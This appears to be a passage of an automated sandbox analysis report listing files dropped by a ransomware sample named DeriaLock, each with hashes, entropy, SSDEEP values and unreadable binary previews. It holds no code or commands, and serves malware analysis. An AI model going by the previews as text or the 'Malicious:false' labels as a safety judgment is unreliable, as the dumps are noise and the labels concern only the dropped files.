                                                                                                                                                    SHA-512:E0AC8A3C6756169A39DBBAC5F7237DE11BDE3F1C64EE67027479398BB412B282796A275E5168C8F5D65024952E20DF32007ABC54C292F6E2856A311D044B6C06
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.Y.-..o@.H.......q..]aZ.!...X.:".$.M...V..9..%.......1"vB.o.;...1..&.h(..$..Y.1(.#.+Q..DVF......*<....'#.....R.d...$.%(X......D....q..M4...1z.....1$>.._.....H..%...C....t.0...0.M...d...|.&..f.".....;.U......9.......2T.A{L.....r..0.!..._...@.7.T..{33..2.........i....>O...'R.3g.X.s....Z.u..[....G.z.....^8t...}..d:t5O%.........ux.s.p.7......v...p.K10.e....X..W...#.*7...8h..u%1..H..Yb......l.5....x.P`.@.vs.%........>.}.Z...n.?..!1......}(aN.B!e.z..i..P.hk..?f..w.......h7...S.~.....z....U.Z.(?<...n.9.........J.0.M._....U.....D..z....j.......RT..........t9>..n.N6S..D+...>c..&C.....[f4y4...oX7...y.....#...*.`Q...-.;>...Z..Pi%b.....:.b.5.....m...GJW(MM^...........!...{..k...pl...CyA......^.&0.<R$b..>..w...,.....C....eeF..........A.n?..e$..\..[;.....O.I....7Hs..M.n.^...+....I..65..v.~:.L{jU..w.D..@z..}.-_Z..g....o*..YKH.o."........R.8..-BH....bV..f`..q..&5;{Q~.Vi..H..0..1.{f.,:.?~....Th).+..S.J......T...|..zy..a.(..wL@v.<....x.3....^.7A~.[\........
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.80852967110574
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:4kGC6Z56mZbBHTO6hhR/F3nV/Ed945eqergT84ExJ:4kGC6Z56oBHTdhXVsw5tb84E/
                                                                                                                                                    MD5:E3DE60834CE62B11EAF29745C40FADFD
                                                                                                                                                    SHA1:6A96142C6C8F335E2241C2ABE9C9CE408C786E67
                                                                                                                                                    SHA-256:6287EF1A56101B098CAB3645648CA844B785B7CA6F2D9632452B9464E7FAF063
                                                                                                                                                    SHA-512:53945360DE6F3F881507239F620B89F27DCCDADE894AECD5F3EBFC4073B497DED2EF70BCFACE33F787D2C66CF40E6F004CF557C599EDD8EC074BFDDEBB86C230
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..q..ga%P@.+.<\R.Z....r...-/.c......u.....'W....l..l.e.=....]z.G*$.......zS..4....Sn.e..6&......-.W.)T|7L..r......{..F...h.V8.(.P...6.....l..tTb.$..# y..x..)..$.y..F....G.wA1.C...RX.0.).A'.T..Q7.d.Kf......n...;......|.j.(7.,W.f..Lh...A.q...H."...L.B..K..|0'}!..J{...B.0l...OYb....Aq.k.Q_..M&....g.e.R.6.....@.ZT.(?.-..{...J(...Z...v..K.;...f...V?..{......0~=.\&....N,"K.*K3._r.#..5.....8...*.7t-S.+e.v.....-!............p..,..8...x.......kW...c...H.J.....r...'P!Pz*.?....;.)6kmk....^2...l.>.n.!).....S.w .\..cH..p...c..?...~e<k..`!.e...1....;S...K..%.i...@Y....1.........k.4...c8..I..O.Z....T,;s...8..4>.!....q..........F....=.}...rU.g..e1...e..gP.3P.*?K..=1cIW..r..].....&.<%].....P.G.$...h3....0.R...m.l-k.*.V.+..c.?..U..5....TD.G..4...j..7.|...cd.<.........1*......7.n.N...q...&:...(.{...Ed.%.......d$....s..i...GS.+.?......2!..7.. ..z..}7V^.qc..L..n....u...UG6;V8L.k.8.;........'=.p=......[...h....>..L.....a.F.A6.W....R...&.A...0..W..|......b.8.M..U...J
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.812124345838786
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:KvFUKCAHqAoGJdjqAYBpmTQDYAMwAPKrdtjnPiarjcN34lp+0:K2vAHq5uAAx2IPmzjPvrjcub+0
                                                                                                                                                    MD5:55FD4F9D1079B7E854D34471BE3B8FBA
                                                                                                                                                    SHA1:C734B9F137FB5818F9307504230538C4EE3233C6
                                                                                                                                                    SHA-256:8BAEFD4DB2EB8B2FBFB778C68C22E3E737478E5DCB3EBFEA07B987000017B364
                                                                                                                                                    SHA-512:CD78CD68D0C827A6C1B2033BB83A829199D78C2A606C7EC7040B11C2321E927D19776E9E896A06E7F6765EF101C1FE49B603379AAEDA0445D3BC7485BC9AFC41
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...3(...........o...u.w....8...#....y..@K_.0...&...K.!.Z..-]gC..B...>...6......k..._.-.@M.5.....C...1...-.....8.W+.d..PS...y..b.3.;.m:..1+...z....Wm.c....&&..wq~.^..BKL..>.l.4...<.W.AB7....MW..d....}_8..D...N8..A..nY+G......[.eh.V...7..=._..g?..V.18.\....%.1....\.h.G....J....?b....g`<....v$G.`"..Zr...m...^1..X...u.\g..DB7.L...+.x...r.%;Wh....|j...V86...B.R..|R.....`....j>....DP..).cx....y7..T.=.j...i..%...M_F...*.08..Pt=.y.P.....B....(...._~...-..k.S..R.+.}P ...Tz.{..@}.w.T.-..A..Z...hS.0.5~ke&...@.#J.......lb.1.(Z[B@.j<;7+.u..F.XY.5M..I.=6U...w...f...&.#.........:A.#...D...Nog.y...yLR(.I......A..\..*i.p..l....B..f.....%..].wQ.hs.U.g/...:.^q&..PY......-..L1.}}onG....+.....}a.,2f..@... ....fS.L..H.i...6C...^G..v....H6O..~u......<....V.t.J...]@.(>...V.D.......OT.`.C..8k......'....A..g.......=....b..D.q.s~.h........+..".X...~.I....|............4......8JZ..e.D..&.8..N.p.I.....r...-HK...d..6.t....P.8...G.u.. .4.......Tz.[W....T..yV..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.820919886043293
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:HeAtMLo0aTrsAcA+GL1nRwexJ/rRm/j1XwkubJ1oy:+AtMDalcA9tRwerUXeP
                                                                                                                                                    MD5:56525037E731F6E2816FD31467A61A3A
                                                                                                                                                    SHA1:E60DB0C47BBA7854BC5C8474667E20AEBF2443C8
                                                                                                                                                    SHA-256:EA48A3F2AB29D4A50D4D9D3B09C46B7061182ED40C7D98264E13C1EC82616678
                                                                                                                                                    SHA-512:6E108EF14BDD6AEECFF028FDFC87138D2F23F5A6785BEFE0496DC900A9ED8D37941DB4A0E43858B17403F590917C338D4D43F08BDABE4E6BEBB3568A02A2F900
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.1.Y..l).ak.U..0.(P.T.Ky..q7...X.5....y.+..m.......].7.7..B.....8G....">...Z..$._B(_.R]..1{)..........!ch.Y..y..rV.."{.gu?OX%...>H.....L.D.}....j..fV0x..m..ij..R{{.B....W.Lu../l..i.M..05....J.fE.x..2.`K.1...?....H......g.e^..\Fz.s9.....g...7_......k..t.3O..t.q..F'!B..m7..K..........fJc ..&..^.......#...j.k.....1....u.%.1.. .....5U.VN3...T.|.....m.FV.G..B.%Yk.nQ.~.}<].E.IOo.k....g...c....-KzOD...oP..u.o3%...Q.e..H.B.?q.F.....Z>...d..\....2......_.....Cfg.L.,&.........M...r_.p...?.r".[.L2.......S.FU.e=;'.... 7..>.......~.5.:. .kG.Rl./xD.../.....(.e.M..B.LpS..$"zYY.........C...U.Q.s.6<@M...<...+....X......t".;.........A....5.......3x._...5.?..h$..';..a$...4{(.....`.FG.s....}.....UHs..p|..FA.(pw.:...=7..c..=.....<.;...&...Lh.(......l......|3..@L!3^*G.Av-A .Y.L......_...).=xK.....A....~C..%K.)j...4......y....b.}.....S..OY.B..q...BB.e....?=NF;....A..7{. I1.P....../......H...... f@.cU.....m..wp....f*..Hn....J\?%C...N9.*."....L..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.817503908709266
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:CDAsC7qHR2Ry8YfWQ5+FyRG+9asGhovBJSNijEav5bhzh:AAsP2yNeJ4RGeaZUDGwEaHh
                                                                                                                                                    MD5:5F60C67C8F97389ADF1C41BEDD871935
                                                                                                                                                    SHA1:1E2F6E569E0C5295D3B7AFA5309FE493925AF6C9
                                                                                                                                                    SHA-256:BBE82F783CEC53096B6ACF30067A73EDD2920835C4C1B84BE308B9A168946225
                                                                                                                                                    SHA-512:BA5A437850BD6968C739001C893FE3C49F30428D86BBCA5098822AAFEDD78EB5B32C687685057AA7B2B74C3158B7047EECE272AE291F88A6F8E765B05276A6F6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:7......J.....*.U..VA..U4..X.>M.L..;/..!"......Kk.g~..r[.X...M.+$.d.+b'3.0.'...."Uv...I!.`...,.......m.S.`r...[....Fh..x.3.2..^.@.M.....@:Wa..r@..|/#O.gy...h.Vfy......9.l"KL".Jt........Xt...^W.Q......3.....yC..6(t...O...j..a..:.!7N....Y~.D.[...t.9....;..b7u+..Y&0h....|.C.......q..E..wb.,.j..'?iM......,.1B.4W......+.*W.^....6............G..A.6...s.).y.Q.F.o.@....|..}W..j"Q.1...*S4.8P......_....,..gpY."f....x.D.hHL....}....UW..+......N.....BG...A.[%..}...h7.....n.\...m.Z..U.k..$..g.E...]|'.v.....[..........D<.q...*m.%..Y+Q#k......&0.F..U....,.?.%Y.....}..m......P......v...i..S....HL....>K.....N.r.r$M.aC.w.m 4....q'!..q.......V.$...>(.....C.+^..U{X.=..w|...9.~N+h.aY.b..x..&%j. V.ss.(.@`U..}O.w....2..+.#..wk.....{;..9z`%F..I..G.0......p..g...b.5.N.]q........g9....<..y2....c..x.0....1'...........x@d..$...`.g.q....;]4...P:D<Me.e.8*.O\7.....[..>.2..Ys...."@.$.fm.q2...5..i.gIJ.k.!{>.u....'.$..K..F`....+h".... i..0.........G...... .f..Ne.Y.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.8153334962923875
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:z8YVsmo4+8Ej7E5I1EPGlxlTaz2CFGUiwzn:zMmL+Hj79/TaNAjwz
                                                                                                                                                    MD5:D6805CF65941C59F2FCEBD83996F4342
                                                                                                                                                    SHA1:729B18E7175A9929022693A79E6D38848A2FBA27
                                                                                                                                                    SHA-256:0117008FCE97D0687ECD81F44B1B658EC8D90467325C51694ADB6C04343CBD64
                                                                                                                                                    SHA-512:659BBEB78E705AB5D027E6F256CA707C810A412973E9B1B6F90B2C73C4104F9007289E9A21D5D2B4AD22070A6EFFDA8BDD82C52657BD5F3931D5D77BD165A62E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:x.w....]...L.Y...,...d.I.S..A<....w.....Y..?.;?@..h.T.o]A..Z......r.-..o.@.....bktz.e&..;Ul.=~$..m.....5YY....>Z..e....3...e..a..m......N.l.+<.....pN.....L.C.!..".S6i9Ah.!1...ii0&"..'..l.....?4.;b...E%!>..Fk.*..t...t.0".:u.XV`J?..\c.U....]I"FW.0.U..n...$.%..q..~.;.....D$......M....t..y..0...?d.f.K&.....y.D.+.>.........s..b...m.;..(^fb.....4V...'....J,.\.by.=~....r.5...w.....X.Zwb...v.&.NLCh..X.9>.$.he..S@.b+#......ro.<l.F...C...5$.'...1...@....f..._...8.1}..gu..\..q8k... ^:...U..;..P.i.....h_I=$.....e...........1..IF..[..r.a)..Z.P....^......T..*........U..^^_.24..........&.g....E/"......Nq...s.....J.`<.b.v1F...q.3.UH1;&#BAlJ......l8q..9U...k....W.$..3....&.(;..\+.qq..6.*.Z...U..KV..4....C..y..:.Y[ x..y.$sr..>.n...K.6...q"k...}...[.Okw...u~eq.)B.uZ..{.......}..(] !........#..z....\&........Y..QH......#...w.w...mE..y...R".$..b..o.?.{-.D..vB.1.y.P.....2...b..b..Q:.H....f`.X.%C.!..tg.OZ9..R...8g....dL7...?...eQ#..".q.`.R.2'..
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.8264572316175895
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:P/5XYpsQvUS92cuV0DCCI5wsMCCRZ/oAs73+6MmC9qSazaN:PSp192cuVquwdCqZ+7Kdao
                                                                                                                                                    MD5:3E4421CA27FD7CF3AD09CD24388F95F9
                                                                                                                                                    SHA1:9704F360B193EE1DC807BDF13A5C6DC918E54D10
                                                                                                                                                    SHA-256:8F7ABC8885ADCA9A19438B117CDC367288662BF6077671876DEC1F6B8DB412D8
                                                                                                                                                    SHA-512:71BFAEC863C351CF5C3C671607A9A7B9A39A6A108C06A0769B99B40061576E00279D046C9B9CED19BB658B369EDD9632CA1C3B8CA657B438CFEAC1E2FAFB9FB8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:9.FY....I...9.#8.._#.y/.zu......D...7.G........#..?P.F.E.d5.F.lf.H.... .k=+.2.........Rf......b[b.2.a./....@...c.-.r....s..6..L#d....Fu._.-(..7.s...l..o.Fh.8..o....Y.#....Cj."~....'.H..:k.......7k...JZ..........w.....G.\.n.<.9B.....3@.0..r`...1..0.X.g.t5k......w....NC...i..q'.q..3{?'.\e=s...q]....zZ..........Rd.6&...u..~s.I^..jH.....;......I8ie.L.2...\.......4|%.E....]4......D.'/.....=.}d)9.....|...r.1...!0.....c...I.,{.9;.z0....mL.....i...!R..."....(..-,..$.=.I,......J:.*...a8....Z4.Z....5..e..V.*VP.F;l..[...{..J.^. a4WVY.`..{i..<.3.d...U.x..y'...G.N<.T>...cG_..&...G.y.. ...........d4.'..\.Bd.w.2.:,O.-.7...X..J..=...R.s..N.t../....d....k..I.F......|.......].s{..!e..3.....b..$(.T.-1i.I.>...I._HI.c8P{..."....U.x......o.=D.Ve......rS:..C.Z.Ut.........+r..7...@u..a!.q...&.WUy......`..l&......rSgH.W...T.S.NB.1..;,..o0.6..cWi.....V..P./..(.)....Gy.........X{a.u..).\K.....D..5.a(.b'.L...w.}(ic../+1.S}.l.IR......S6BENSq..!.Y>$......c,.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.813095506524801
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:VGswgjsmOSN7wUf+/wmqaN8PWp+iuGM3ONlO:VGahtN7wUf7viZ+ONQ
                                                                                                                                                    MD5:238C1A3BE2480A471F13A6294C3111A9
                                                                                                                                                    SHA1:BEA17BB2501396D03E96814BCA08F3FE2C2F7C39
                                                                                                                                                    SHA-256:6441ADE1B37974923A0E59A1A325C9EFD70D916650C2262B37624B9037B36284
                                                                                                                                                    SHA-512:733123823AE1A308AE2E66C55F0385081FD3816E52527B235950E1C9274993D168898DD35EADB6B47DC45E7A06B5D166AC46255E5DAC7308407A24EF31FEC540
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.8..bE.....ES.-....9.P,........0.....P6v.n..Y...{...a.<.....l.`+..h}l...Q...g.!.RZ...q.i[..{}M~....#NFG...i@<g..A.A\V..)L.T#.{.$......i.my..K2.......?.......Y..q..1I...A...;.y5.V...%.v;..".f..zM... ..#..m..;T....-X..Jt.W...hv...4....."w8Ue.">..........V.%&...x?.5.~7..]fw).......4%F...E........F-,u5Kg.9...T.....p.7.V.R..N[SJ.A..i..eu,..<...z..x...D.N..*..5.....P8...~........7...xH......<.fR...I.f.1..:Jw...'.]..#K......L...7..w..3C.@...s....\.h.(.{.5.K2'.9*.....c,1..........5f.3$_Guw..t.O.E.`$..dU}.....[!.``Y.F.5.!i~.....~.k.........*.....y.y.........(.z.YX:}`m.%P..ZP4...........1V.....yK.4.Z..t....Ix>......=.^...w..YZ.:...@..$...<.K.I=....7.....U.>9u.H.4.-..G.......Ma&)...@wS.8\.....}..|.QT.-7...A.x.{.r.C..5.V0,...z>Ql..._.bw...C..V.d#.e.T..c...LE..z..fm...WLP..[d...83N.P(..5!#.lY..;.M.Y.]z..O.....i.1.#.h{l...3...*Q;..}.z.Q.......^'....c....M..1B... .k?.&9P_p.^+..p.A..{c|...3J.C.c3g...X0.Y..<.l&.x.1..!ASc..-....Ar.(.Y.uQ..$a...
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.794156831375868
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Dn0VNQW+ajtUthrnkt42M0YrrgtiCcc6sLRU:W+5rnkq2M2djzU
                                                                                                                                                    MD5:ED2DDD0C3E32791CC14AB66935F80BB8
                                                                                                                                                    SHA1:EA73E48C49D904A0FB565FA3E810A24C5A45FCD8
                                                                                                                                                    SHA-256:C8A237CA19115F9AFA3CCF95F4D5F29AC9C3539D1A3DD77C3FB2C0BEA20F7BAA
                                                                                                                                                    SHA-512:C5406193EE05F83299E43E13216B586FAA9209205B66F8A8DA3DC90EFA624852298F98C40EF4BA7460859BA13A1197EC534482E1BC0561F456226EB5CE89E1B1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:..C.V..8....0......'\ .>s=..>1..+....T{.F...)x.h...5..P>.~R/......[K...w.V..[..z.p..7...........9_[....(8.K.L,-.....&..:..Zk......6....._O..^..p.g...0.:!mHA9..l..8e...Q..?..{p..Qj.......)....^..5....)f....,G.....*.k...D&..0JZ.M8.D...2.o'+......S.c.V...5...|..T...i..U..nfu...X..K..I.c..[_t:G..ms*7v..A~b8.d@..1.S..4......":.u.}....6HE....hr..,8t.PO!.Z...=F..=Q,......r.Z...y>Z.A...@sG.,...M..o..P...Uw..{.I......:.k..D#U..4....4....4.6..{..tUQ.......!....'..WE..E.9....eO.7../!....0`....I........?.,x.(Q..-D.|.u;....x..r:..y..u.....I.e....J*D..{T.......~...........e.k...S..j.....e.w..B......ym..M..$p...o...........wTc|..g....~.M...9]}~...]..M...]h).W......7}jy.O......u..Y.......a.......E.R7...I._..h.U_t...<....|.D..w.3..7./.J.(W(S...Z.$t..V.d.gqf.;\.+.%s.O,.........h.)c..'[c.C.OY&r7..>...0.V[<.@....H...T.c..Z3...VX..vz...m..`K.!....q.....]..u........e...M..>.*3Up..u.l.K.r..r'....I... ....D..Ha....y.W+..yw....rJ........*z..91.A..D.5
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.829736608063958
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:X9cGa2BiMGmIFTUVOHPXR2IIRC3eXzxyeQ6l6CDgATt32AOn:qLKYmIFToKJ2G3eRD9Us3nO
                                                                                                                                                    MD5:602D793F6AF6B68A8486B5D62F7A1727
                                                                                                                                                    SHA1:08485043FA5CEB705992EB73F365C7893AFE3C97
                                                                                                                                                    SHA-256:96048D2E965D8BE45B68588670A69BFB81D0C89F15480CAAD51A51CCCF434297
                                                                                                                                                    SHA-512:55255F2333C6928A2A45C150D550BBA099E826538A12A00A4A0FF9B031E3BC291291B743261932A900B12BCF1FBBF5DA5A6AAA97A18C96628EA663D3437C5939
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:y.yf..MM.!]...I.r..h.-.2..k.N.a`...>......e0.@.{}}tM.CmX...r.*..0.>..L.a..@G...R.-.Cz..z...)TG.1F.[.9..Y..V.......}...Ec.].&v..}.v...p...q..K.U..........p.....u....A.'..........z..S]...k........_Z..n...."P...I...J.[8.r.$..kK..]'.^...7./.8....]..\kYgK.<..3.j\.9..Z5..8#x..%T..W...A....:......6....q.s.z&E...H?8...@.v5`0..1......'....?.....$.....'.69.5.A..A...._.U..y.}..[...FM....e..d.....;..[{.^...h......8o..>O#.2lk.j..!.f.j....x...EH.....W.......m..*.<=...*9".IJK..\.z...7.g.x.}Q.*.%..d.p........f/....r...b}......Y...L'.8J..#.[c...Z..U..P#5[/..P.....V..Y.4..."...n....7..O#v....u...4.Ln....1[Z=..L.0..U.fV..D..?......|..:..lV.N....'>L..0..^D..YH.H.....kL.p.....V..%WzZ......1...r.....XJ%.Ui...u...;W.....)..dx.7t..Jj.....hKY1..\}IlHGT.....V@.A.[...d.~zwTR..YLj8..<...._W.,K...Z.n_....}....Q..3.-y..x.*fQ.s.&...'.D...qZ!.B6........V.|7'S.....".k.i.&...5..K..V| D..F.....8.......XR.@....R...W.-...L.3bo...w......"L..:.hD....p..4W6......#.Gy
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.81751569934646
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:ACmTVGpJmX9fz/XvcwLMwEJys9NDoJFZzLoEVTRIe+9hth9IiJza:nmEbU9fTrJroo1Q9LHI2za
                                                                                                                                                    MD5:A3983841C1F37F3DB19E19C97F7FE493
                                                                                                                                                    SHA1:C68DBC5421A7367F9F98BA74D9565F90E475736B
                                                                                                                                                    SHA-256:79885193E1633D15000F7489466D82721BFED73331A73A753E98B04DDB537104
                                                                                                                                                    SHA-512:D41FCF5F07BF54F8333AAEA7750E8D16EC40840D02FE31E3FACB5778314F49ED23B9C344B014DA113E8016092BA7EEFF010EF2E076B8B4DBF5EBF718ED80F975
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:.2'|.|?....w1j..r..e..C/....Dm.DxF..8..2$.4=..FI.t...).2.........3..$.*i.*... x...&....lP..'...H......v...2t...-L.D.p..Y..G.2...K.....<.#......5....U.1.R. @v.._..........U.?Y.6..Y....Oj....2L.......cX5b...cE._......:IO..,....A....m.6...|!_..K..$8...B@v.}.s..;.........ja..DO...r....G.&....+..o...E.......c..M..\.G...}c_.8\...d.g..?....p.l.]...........)...X..+G./;..g>v.1..,U..B4.K...HK.1..u..#4...Xc..<..X6.....!..%MB...y....&B.........]~.L.a.x..c.=QI{..@W..b..nUY@........vb..wSY#qT=._.^.!=..k....>.x(...q..d..Iq.. ...,..v.....E6UC,U...*`O.}.i."e..e.N.=.....j5.WM+L.".o.N.r0..|....$p...m..K.|..&...eh i...5.V..1...t.....k6.}..T~....X/.p5...R#...i...u0.+.[....J.......R?h....Y..$$..O-.......B.0q..g5.....^.L.l.c.....'y.m..0&....#Y...N...#...B;.[.#3_qU...."...w.Y.....*.w5#..?"..+. ......lY.{.z....BF..]..4..../K.^.../`.%./|_...uL...p|.[R`...Z...........^R..z...369..P.TJyc.'n.....t..B.R..8$.F$....H..MN ......+f..U.*..|R..?-.._.+...ar......o..<..._.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.811535394712088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:gpHkDz5Yk3ULqdLFDWQF05hXk+sMRPR0Tpmyubs0:bCyUu9FdehXk+sMlqTpmyux
                                                                                                                                                    MD5:34605E98E9DD341BB492AC4528090AC2
                                                                                                                                                    SHA1:8F9668D5EBAB66C08EF78BA444EC4A48B859DFF8
                                                                                                                                                    SHA-256:18E3B2EA247EB89039E85E4A3BAD53B26E76C3A4C057F75A1795F2C5BAE0AE7D
                                                                                                                                                    SHA-512:5CD93294A8CB917D2C09BC73220E7CA456A62BE45ACF77BCE0CD64503B20AFD636CE59D36ECCC3BF4146AD1B5F6FE43A283E8E0F1F6E96378D6D50F4D4828BDC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:O~$.QfS`.%.Vz...=.;..5..... .)..b...R..)..Hd.....o.....-..w..2.R]....Je.K.]......j.r..h...f..P._......._....)`.E...^.....".....b.....w.2....%.g_-..1m0$.(....q.<i.|.VTR...?.....9_^.M.g....W..C..}.......rz..YSjy..,.Q{.....,...nt.|joG...wgJ......&?\.X{..J.....P.....h*rD-.)......S.]...=..U....4s~.............*=ke."2...e.{9..i.]3.&.s.%.h.c g....L'm./.P...F...A..A1L*..h.d.j.D..0..S...v......R{9..C..u....i...6.j..4.3...#I_.q.... .>h.3.r..aT....x..>..l.r/...J...Q...cZ'..?*:jC.._(B.....5eC.T..Cr...?.9=.....He....}.M...[...0XcM....m.~.e\t"..B.mW.?.J......... ..*.O.b..i..'...i....^q.z<.......mi.tr.....K.66s.X........s.2rf3.....R......9..R..Z.Z.l.8]O[..;./X../.S.H&tu.m.)......;..9_:.uh..~.....0.i..s..W.7..P..a...W~.S.B...G........j.......^...5Le.....$..#c.S,..=z..[@..c.CGT.~.N.;.....,....W.&*...)......&.....e.$#.[.@..&wq..6...^]..1..q|8.e=...%.....y...g.+-.U.|.....ySOx...WN.....S.4....4..|{YX....`D.M*n..}@Geb...K...S.+L.{#.........G}Cs.d'b.Ra.O
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1088
                                                                                                                                                    Entropy (8bit):7.7947868359604495
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:IC2ZEYyEpE34Ie9wLTanNOxtANRl6CugvaZdOiph7cqCWLoX0Kmf1HRH0:3aQE6Iz7nfNT6VDDhgqCydfj0
                                                                                                                                                    MD5:635175231C1E81DCA7F9158C2D705693
                                                                                                                                                    SHA1:0AFA4AEDBD121F242FB18605C7D1BF0698C060F4
                                                                                                                                                    SHA-256:F3FA80797F4C6B4B6EA85313FEA0FAB37D7F5AE501FBF93CF8821CEBBB4F45CD
                                                                                                                                                    SHA-512:3100CEADD4B196C77A2BECD034DBED2323839AE5E4A6BE0707CA3FEB2587C48A1C1DCA59CBAD83984854CE991A04DE32DD999270DA3A96161923C0D17F3A1854
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview:...e%.T.H..../A`zRz].B.f5.ZX...,o..C......)....).]...=>.4.<X......o..)..(..h.r.1.`..`.N.=B;...78..s.l...H..w`.#.........*.@..Y...@..m....@.."'C...S.%..... .[.).It>7..!....c....4.......#.%.%D.......1|..\..o..Ag........c..f....!|.d...TGT..=...}...E.Bq..K....m|....Z.g\.u.0..F..y).'F...I.q.q.N......W...<`....R+......B.~E..9.,G......!m...zl.aJ....W?......B.*..z.w.....H\....wM 'w.".~.f..b.....B..H....:..c....SP.j.2r.....b'8..`..g1<.$.S.......<.......G.L.3............GF..Z...pe|....B+.U'Y......f.......+p...3.XK ...(o..t..a.........?....R^..g.....<..kf.4*%-..9.nP....^c..K:....O_.P...-.......I+>.}...^...a.....4e...,N.n.~.1..=..W.....<.d&\.N.c'V.3.Z.dL{2........0........^......... ...:['....Z.).....{....}B.=-.a.q<..b.6.W.W..bZ..WW....{......f..2qRd.r.......v.I....0...ui.......d.fT..%....%....s.LJ...h..^@K{I.e.\./...{-x.....-..<....K4..gmY.N..a.."..CPa~Y.....+..gf........T.....>it..>..g...@H...,.4..i..CP.........7>...6.....GIbT..m..}/.Y.
                                                                                                                                                    Process:C:\Users\user\Desktop\Endermanch@DeriaLock.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1040
                                                                                                                                                    Entropy (8bit):7.839117762573255
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:Xct/fKIiups0Q0AqrVknmhVkJLcpULUasyY85WEmal6e/Rsem+:W/fFXpsJdmcJLg2UdySA6e/RO+
                                                                                                                                                    MD5:35A29ADF2E034EE8376B94A04E9C025C
                                                                                                                                                    SHA1:AFDAC37CCC4C1B58393ABB48D24F7C9F1A626918
                                                                                                                                                    SHA-256:4BD3931E647EFDF712A5AA1E76AAE38F2A84E111705FCCB3079BB8CAEBCA9184
                                                                                                                                                    SHA-512:84796FADE2B9D4FC0EAF6DEC719D89EDBDC9D6078855019827D273C7915A70DFEBD9304BEF11CA606FC59A97AE593F9345B5B816921383963E44E2C1FFF5D607
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
